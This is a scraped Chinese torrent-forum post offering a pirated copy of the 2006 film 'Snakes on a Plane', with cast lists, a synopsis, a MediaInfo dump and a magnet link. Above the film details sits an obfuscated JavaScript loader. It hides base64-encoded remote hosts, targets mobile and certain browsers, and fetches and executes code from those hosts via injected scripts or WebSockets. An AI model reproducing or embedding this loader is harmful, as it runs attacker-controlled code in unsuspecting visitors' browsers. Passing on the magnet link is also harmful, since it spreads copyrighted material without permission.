航班蛇患[双语字幕].Snakes.On.A.Plane.2006.1080p.US.BluRay.x265.10bit.DDP.5.1.MNHD 6.71GB

版主小s 1月前 172

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 航班蛇患 / 空中蛇灾 / 毒蛇航班 / 蛇袭航班 / 飞机上有蛇 / 毒蛇吓机
◎片  名 Snakes on a Plane
◎年  代 2006
◎产  地 美国 / 德国
◎类  别 动作 / 惊悚 / 灾难
◎语  言 英语
◎上映日期 2006-08-18
◎IMDb链接 https://www.imdb.com/title/tt0417148/
◎豆瓣评分 6.2/10 (18766人评价)
◎豆瓣链接 https://movie.douban.com/subject/1482080/
◎片  长 105 分钟
◎导  演 大卫·R·艾里斯 David R. Ellis (id:1050082)
◎编  剧 塞巴斯蒂安·古提耶雷兹 Sebastian Gutierrez (id:1049990)
◎演  员 塞缪尔·杰克逊 Samuel L. Jackson (id:1054408)
       朱丽安娜· 玛格丽丝 Julianna Margulies (id:1017890)
       内森·菲利普斯 Nathan Phillips (id:1294467)
       雷切尔·布兰卡德 Rachel Blanchard (id:1031934)
       福勒克斯·亚历山大 Flex Alexander (id:1000332)
       基南·汤普森 Kenan Thompson (id:1044941)
       凯斯·达拉斯 Keith Dallas (id:1423832)
       林·沙烨 Lin Shaye (id:1276530)
       布鲁斯·詹姆斯 Bruce James (id:1183104)
       桑妮·马布雷 Sunny Mabrey (id:1036462)
       凯西·迪布瓦 Casey Dubois (id:1090672)
       杰拉德·普伦科特 Gerard Plunkett (id:1323900)
       特瑞·陈 Terry Chen (id:1004684)
       埃尔莎·帕塔奇 Elsa Pataky (id:1010610)
       艾米莉·霍尔姆斯 Emily Holmes (id:1032344)
       泰格·伦岩 Tygh Runyan (id:1018264)
       大卫·科恩查内 David Koechner (id:1049670)
       鲍比·坎纳瓦尔 Bobby Cannavale (id:1044985)
       托德·路易斯 Todd Louiso (id:1004880)
       汤姆·巴特勒 Tom Butler (id:1328973)
       肯德尔·克洛斯 Kendall Cross (id:1356513)
       凯文·麦克纳尔蒂 Kevin McNulty (id:1123526)
       泰勒·克奇 Taylor Kitsch (id:1000016)
       拜伦·劳森 Byron Lawson (id:1110831)
       克瑞斯塔尔·洛维 Crystal Lowe (id:1116878)
       阿加·达什 Agam Darshi (id:1341055)
       丽莎·玛丽·卡鲁克 Lisa Marie Caruk (id:1400140)
       关永扬 Darryl Quon (id:1354779)
       戴维·尼尔 David Neale (id:1132286)
       Mi-Jung Lee Mi-Jung Lee (id:1109656)
       凯尔·阿里沙兰 Kyle Alisharan (id:1057025)
       Drew Wicks Drew Wicks (id:1340920)
       莱斯利·阿莱特 Lesley Aletter (id:1058459)
       马特·贝克 Matt Baker (id:1305505)
       帕丽斯·希尔顿 Paris Hilton (id:1006972)
       罗凯利 R. Kelly (id:1014146)
       Chris Taloa Chris Taloa (id:1166946)
       加里·莱温索恩 Gary Levinsohn (id:1289901)
       Penney Finkelman Cox Penney Finkelman Cox (id:1283758)
       Tawny Ellis Tawny Ellis (id:1014947)
       Sandra Rabins Sandra Rabins (id:1295098)
       托比·艾默里奇 Toby Emmerich (id:1005136)
       Craig Berenson Craig Berenson (id:1006156)
       Mark Allan Staubach Mark Allan Staubach (id:1050917)
       特沃·拉宾 Trevor Rabin (id:1014253)
       亚当·格林伯格 Adam Greenberg (id:1276464)
       霍华德·E·史密斯 Howard E. Smith (id:1037969)
       明迪·马丁 Mindy Marin (id:1291003)
       Jaymes Hinkle Jaymes Hinkle (id:1055919)
       马克.加巴里诺 Mark Garbarino (id:1284493)
       Joe Colwell Joe Colwell (id:1281086)
       Monica Huppert Monica Huppert (id:1105836)
       托德·马斯特斯 Todd Masters (id:1291248)
       艾伦 A. 安彭 Allan A. Apone (id:1277325)
       Robert L. Stevenson Robert L. Stevenson (id:1298419)
       Anthony Allen Barlow Anthony Allen Barlow (id:1064537)
       罗伯特·A·潘蒂尼 Robert A. Pandini (id:1055674)
       Rudy Van Zyl Rudy Van Zyl (id:1042978)
       弗雷迪·海斯 Freddie Hice (id:1286573)
       Ania Musiatowicz Ania Musiatowicz (id:1308396)
       Eric A. Pot Eric A. Pot (id:1025653)
       菲利普·摩西 Phillip Moses (id:1292593)
       Sylvie Talbot Sylvie Talbot (id:1298860)
       迈克尔·科琴斯 Michael Cozens (id:1408610)
       Jean-Francois Houde Jean-Francois Houde (id:1201001)
       折笠明 Akira Orikasa (id:1198934)
       Robert Tesdahl Robert Tesdahl (id:1184677)
       Romain Bayle Romain Bayle (id:1310674)
       David Legault David Legault (id:1055104)
       大卫·埃布纳 David Ebner (id:1302384)
       Leif Einarsson Leif Einarsson (id:1303968)
       格尔泽格茨·扬卡蒂斯 Grzegorz Jonkajtys (id:1308932)
       肖恩·斯特兰克斯 Sean Stranks (id:1305336)
       Bill Houston Ball Bill Houston Ball (id:1066112)
       Ed Mendez Ed Mendez (id:1305392)
       Nicolas Langlois-Demers Nicolas Langlois-Demers (id:1218051)
        Krishnamurti Costa (id:1224110)
       Chris LeDoux Chris LeDoux (id:1037852)
       丹尼塔·斯劳格赫特尔 Danita Slaughter (id:1239865)
       Richard Martin Richard Martin (id:1291141)
       Daniel Leduc Daniel Leduc (id:1289641)
       Scott Gordon Scott Gordon (id:1285195)
       Pierre Raymond Pierre Raymond (id:1295305)
       Luis Martinez Luis Martinez (id:1013547)
       帕特里克·克兰斯 Patrick Clancey (id:1071903)
       马克·弗伦德 Mark Freund (id:1284190)
       Sébastien Rioux Sébastien Rioux (id:1308057)
       Kirk Cadrette Kirk Cadrette (id:1279848)
       Will Nicholson Will Nicholson (id:1029640)
       埃里克·亨利 Erik Henry (id:1286464)
        Kevin Hoppe (id:1258119)

◎标  签 惊悚 / 灾难 / 美国 / 恐怖 / 蛇 / 美国电影 / 2006 / 蛇患航班

◎简  介
  黑帮老大艾迪?金策划了一起凶杀案,被偶然路过的年轻人西恩?琼斯(Nathan Phillips 饰)目击。为了在法庭上成功指控这个作恶多端的黑社会头子,警方派出资深联邦密探尼维利?费恩(Samuel L. Jackson 饰)负责保护西恩,并将其从夏威夷护送至洛杉矶法庭。为避免证人遇害,尼维利采取声东击西的策略,与西恩偷偷乘上一架普通的红眼航班。                                    
                                然而这项绝密的计划被艾迪安排在警方的内奸获知,为了逃脱法律制裁,艾迪派出携带大量毒蛇的杀手登上飞机,一场离奇恐怖的血腥灭口案件就此展开……

  1. ##### MediaInfo ######

  2. General

  3. Unique ID                                : 279883186029475078506267068265716800286 (0xD28F8A77CC32316DE3F1E07F683C5B1E)

  4. Complete name                            : Snake[email protected]BBQDDQ.COM.mkv

  5. Format                                   : Matroska

  6. Format version                           : Version 4

  7. File size                                : 6.71 GiB

  8. Duration                                 : 1 h 46 min

  9. Overall bit rate                         : 9 013 kb/s

  10. Movie name                               : Snake[email protected]BBQDDQ.COM

  11. Encoded date                             : UTC 2021-08-14 11:30:49

  12. Writing application                      : mkvmerge v60.0.0 ('Are We Copies?') 64-bit

  13. Writing library                          : libebml v1.4.2 + libmatroska v1.6.4

  14. Cover                                    : Yes

  15. Attachments                              : cover.jpg


  16. Video

  17. ID                                       : 1

  18. Format                                   : HEVC

  19. Format/Info                              : High Efficiency Video Coding

  20. Format profile                           : Main [email protected]@High

  21. Codec ID                                 : V_MPEGH/ISO/HEVC

  22. Duration                                 : 1 h 45 min

  23. Bit rate                                 : 8 053 kb/s

  24. Width                                    : 1 920 pixels

  25. Height                                   : 816 pixels

  26. Display aspect ratio                     : 2.35:1

  27. Frame rate mode                          : Constant

  28. Frame rate                               : 23.976 (24000/1001/53354) FPS

  29. Color space                              : YUV

  30. Chroma subsampling                       : 4:2:0

  31. Bit depth                                : 10 bits

  32. Bits/(Pixel*Frame)                       : 0.214

  33. Stream size                              : 5.94 GiB (89%)

  34. Title                                    : [email protected]

  35. Writing library                          : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit

  36. Encoding settings                        : rc=crf / crf=16.0000 / qcomp=0.65 / qpstep=4 / stats-write=0 / stats-read=0 / vbv-maxrate=160000 / vbv-bufsize=160000 / vbv-init=0.9 / min-vbv-fullness=50.0 / max-vbv-fullness=80.0 / crf-max=0.0 / crf-min=0.0 / no-lossless / no-cu-lossless / aq-mode=1 / aq-strength=1.00 / cbqpoffs=-2 / crqpoffs=-2 / ipratio=1.30 / pbratio=1.20 / psy-rd=1.50 / psy-rdoq=1.00 / deblock=-3:-3 / ref=6 / limit-refs=0 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=1 / max-keyint=250 / rc-lookahead=100 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=32 / min-cu-size=8 / me=3 / subme=7 / merange=57 / rdoq-level=2 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / no-cutree / no-sao / no-rect / no-amp / no-open-gop / wpp / pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=4 / tu-intra-depth=4 / limit-tu=0 / qg-size=8 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=3 / numa-pools=12 / log-level=2 / input-csp=1 / input-res=1920x816 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / no-aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=5 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=0 / no-early-skip / no-rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=1 / transfer=1 / colormatrix=1 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  37. Default                                  : Yes

  38. Forced                                   : No

  39. Color range                              : Limited

  40. Color primaries                          : BT.709

  41. Transfer characteristics                 : BT.709

  42. Matrix coefficients                      : BT.709


  43. Audio #1

  44. ID                                       : 2

  45. Format                                   : E-AC-3

  46. Format/Info                              : Enhanced AC-3

  47. Commercial name                          : Dolby Digital Plus

  48. Codec ID                                 : A_EAC3

  49. Duration                                 : 1 h 45 min

  50. Bit rate mode                            : Constant

  51. Bit rate                                 : 768 kb/s

  52. Channel(s)                               : 6 channels

  53. Channel layout                           : L R C LFE Ls Rs

  54. Sampling rate                            : 48.0 kHz

  55. Frame rate                               : 62.500 FPS (768 SPF)

  56. Compression mode                         : Lossy

  57. Stream size                              : 580 MiB (8%)

  58. Language                                 : English

  59. Service kind                             : Complete Main

  60. Default                                  : Yes

  61. Forced                                   : No


  62. Audio #2

  63. ID                                       : 3

  64. Format                                   : AC-3

  65. Format/Info                              : Audio Coding 3

  66. Commercial name                          : Dolby Digital

  67. Codec ID                                 : A_AC3

  68. Duration                                 : 1 h 46 min

  69. Bit rate mode                            : Constant

  70. Bit rate                                 : 192 kb/s

  71. Channel(s)                               : 2 channels

  72. Channel layout                           : L R

  73. Sampling rate                            : 48.0 kHz

  74. Frame rate                               : 31.250 FPS (1536 SPF)

  75. Compression mode                         : Lossy

  76. Stream size                              : 146 MiB (2%)

  77. Title                                    : Commentary by Director David R. Ellis, Samuel L.Jackson, Producer Craig Berenson, Associate Producer Tawny Eills, VFX Supervisor Erik Henry and 2nd Unit Director Freddie Hice

  78. Language                                 : English

  79. Service kind                             : Complete Main

  80. Default                                  : Yes

  81. Forced                                   : No


  82. Text #1

  83. ID                                       : 4

  84. Format                                   : PGS

  85. Muxing mode                              : zlib

  86. Codec ID                                 : S_HDMV/PGS

  87. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  88. Duration                                 : 1 h 45 min

  89. Bit rate                                 : 44.3 kb/s

  90. Count of elements                        : 3214

  91. Stream size                              : 33.4 MiB (0%)

  92. Title                                    : chs&eng

  93. Language                                 : Chinese

  94. Default                                  : Yes

  95. Forced                                   : No


  96. Text #2

  97. ID                                       : 5

  98. Format                                   : PGS

  99. Muxing mode                              : zlib

  100. Codec ID                                 : S_HDMV/PGS

  101. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  102. Duration                                 : 1 h 45 min

  103. Bit rate                                 : 44.9 kb/s

  104. Count of elements                        : 3214

  105. Stream size                              : 33.9 MiB (0%)

  106. Title                                    : cht&eng

  107. Language                                 : Chinese

  108. Default                                  : No

  109. Forced                                   : No


  110. Text #3

  111. ID                                       : 6

  112. Format                                   : PGS

  113. Muxing mode                              : zlib

  114. Codec ID                                 : S_HDMV/PGS

  115. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  116. Duration                                 : 1 h 45 min

  117. Bit rate                                 : 22.0 kb/s

  118. Count of elements                        : 3214

  119. Stream size                              : 16.6 MiB (0%)

  120. Title                                    : chs

  121. Language                                 : Chinese

  122. Default                                  : No

  123. Forced                                   : No


  124. Text #4

  125. ID                                       : 7

  126. Format                                   : PGS

  127. Muxing mode                              : zlib

  128. Codec ID                                 : S_HDMV/PGS

  129. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  130. Duration                                 : 1 h 45 min

  131. Bit rate                                 : 22.6 kb/s

  132. Count of elements                        : 3214

  133. Stream size                              : 17.0 MiB (0%)

  134. Title                                    : cht

  135. Language                                 : Chinese

  136. Default                                  : No

  137. Forced                                   : No


  138. Text #5

  139. ID                                       : 8

  140. Format                                   : PGS

  141. Muxing mode                              : zlib

  142. Codec ID                                 : S_HDMV/PGS

  143. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  144. Duration                                 : 1 h 42 min

  145. Bit rate                                 : 30.6 kb/s

  146. Count of elements                        : 2463

  147. Stream size                              : 22.5 MiB (0%)

  148. Title                                    : English

  149. Language                                 : English

  150. Default                                  : No

  151. Forced                                   : No


  152. Menu

  153. 00:00:00.000                             : Chapter 1

  154. 00:03:11.108                             : Chapter 2

  155. 00:09:23.772                             : Chapter 3

  156. 00:14:07.221                             : Chapter 4

  157. 00:21:16.734                             : Chapter 5

  158. 00:27:24.476                             : Chapter 6

  159. 00:37:30.999                             : Chapter 7

  160. 00:45:35.608                             : Chapter 8

  161. 00:52:19.386                             : Chapter 9

  162. 00:56:05.529                             : Chapter 10

  163. 01:01:23.388                             : Chapter 11

  164. 01:09:40.009                             : Chapter 12

  165. 01:15:36.574                             : Chapter 13

  166. 01:21:02.900                             : Chapter 14

  167. 01:24:08.669                             : Chapter 15

  168. 01:29:43.003                             : Chapter 16

  169. 01:34:08.309                             : Chapter 17

  170. 01:39:23.166                             : Chapter 18

  171. 01:45:38.082                             : Chapter 19



TAGS 动作 惊悚 灾难

磁力链:
  • magnet:?xt=urn:btih:CAF24F1562A02D5399D69585558B1D37E13D8192
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回